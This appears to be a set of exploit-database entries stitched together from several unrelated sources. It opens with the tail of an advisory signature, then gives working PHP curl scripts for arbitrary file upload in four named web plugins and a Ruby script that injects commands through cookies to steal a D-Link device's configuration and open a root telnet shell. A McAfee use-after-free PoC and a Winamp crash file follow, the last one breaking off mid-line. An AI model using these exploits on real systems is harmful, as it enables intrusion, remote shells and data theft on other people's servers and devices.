Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF SEC Consult Vulnerability Lab / @2015
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iQIcBAEBAgAGBQJVjTcBAAoJEC0t17XG7og/eMEP/0AYTeU4D59vP7eZvcVDdcJe
vt/rKr9MoBSEVki353Fw0cSEQXXsAS3mIkK4Ux9mpwgGfFo5cSm5Yi3ExLJ7eYJV
/PgkgNDeS9+lj08MaGBwcmuodzzvYmcfeErnqsNvV7V1vaqe4gfRjvSI5+h5F28l
8DtQEF98WOSNsDxJmPN9lwVsZ7d9QH2duCvyhJ/RY3LFr+3s2JvyX8YoCx+77PBK
GnuaOt1hLLfONeMiSpqXZxvOpegj7igx5mTStlNHCbxxos1Rz7UpyRWMnMtMz4mi
+mZIBbDeGEoSblGn202TjbM2uYNp5OCCQPCp7pGW2w3AtoQvQDxMCnrkzbK9ORBz
9q8epixzL/GQXd2rtloV7+Kj6Qz13Tvh36rpxvrhR9X/u6N5O7TObMy8n0fZimjh
KMip21wn7JniBE4A5jBssdNM3ktfEPdjTBW2N5NAqGQ5VSIRJzI3yVjZIKUH1+WJ
dcrQHK36II4CvVTIGsXf/20oaZewGpkmSn/p5iuQy5HBMnXU+/Xr5w1z94vmCOOj
a+rUToaCbdK1Ldx9pSktX6OY9bzf1hkZbzNs/UncKa72hha1pTuwR76wY37hMrWu
aRI2ZDNBbt/YuHjaiIOcramg9519AcWIoq9kcKIWJdpp2m9ZN3ub8TWPmde6Puii
9TVqPEBEU8NH1SeTdDvw
=//g1
-----END PGP SIGNATURE-----
source: https://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
source: https://www.securityfocus.com/bid/54172/info
Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
# Version : 1.0.4
# Link : http://www.silverstripe.org/pixlr-image-editor-module/
# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
# Date : 21-06-2012
# Google Dork : not discover
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
source: https://www.securityfocus.com/bid/54173/info
Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Flip Book 1.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
# Version : 1.0
# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
# Price : 30$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/flipbook/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
source: https://www.securityfocus.com/bid/54179/info
Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="db.php.gif";
$uploadfile2="lo.php.gif";
$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
'user_file[1]'=>"@$uploadfile2"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
the only 'filtering' on this resources appears to be a sprintf()
call which statically prefixes a submitted 'dev' argument with '/www'.
However,
if a HTTP request is performed without a 'dev' argument at all, the
sprintf() call is never reached,
and a fully-qualified path can be provided in the 'path' parameter -
bypassing the upload path restriction.
***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
-X POST \
-i \
-F name=@test.txt \
--http1.0 \
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
========================================
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allows an attacker to
query the device, without authentication, for the following information:
# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information
Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.
=========================================
# Information query.
curl \
192.168.1.3/mplist.txt
========================================
#ruby poc
----
# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'
# Set defaults and parse command line arguments
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80
OptionParser.new do |option|
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
end
option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
end
option.parse!
end
# Define which actions we will be using.
actions = [
{
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
},
{
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
},
{
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
},
{
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
}
]
def noop(val)
return
end
def txt_parser(txt)
txt.split(/\r?\n/).each do |line|
puts " #{line}"
end
end
def conf_writer(txt)
begin
f = File.open('./config.sqlite', 'wb')
rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
end
f.write(txt)
f.close
puts "[*] Configuration fetched into 'config.sqlite'"
end
# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"
puts "[!] Attempting to extract information from #{url}"
actions.each do |action|
# Fire the request and ensure a 200 OKAY.
begin
response = RestClient.get(
"#{url}/#{action[:path]}",
{:cookies => action[:cookies]}
)
rescue
puts "[!] Failed to query remote host."
abort
end
if response.code != 200
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
next
end
# Send to the processor.
puts "[*] #{action[:name]} request succeeded."
send(action[:call], response.body())
end
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/54190/info
Winamp is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users which may aid in other attacks.
Winamp 5.13 is vulnerable; others may also be affected.
PoC :
#!/usr/bin/perl
my $file = "dark.m3u";
my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 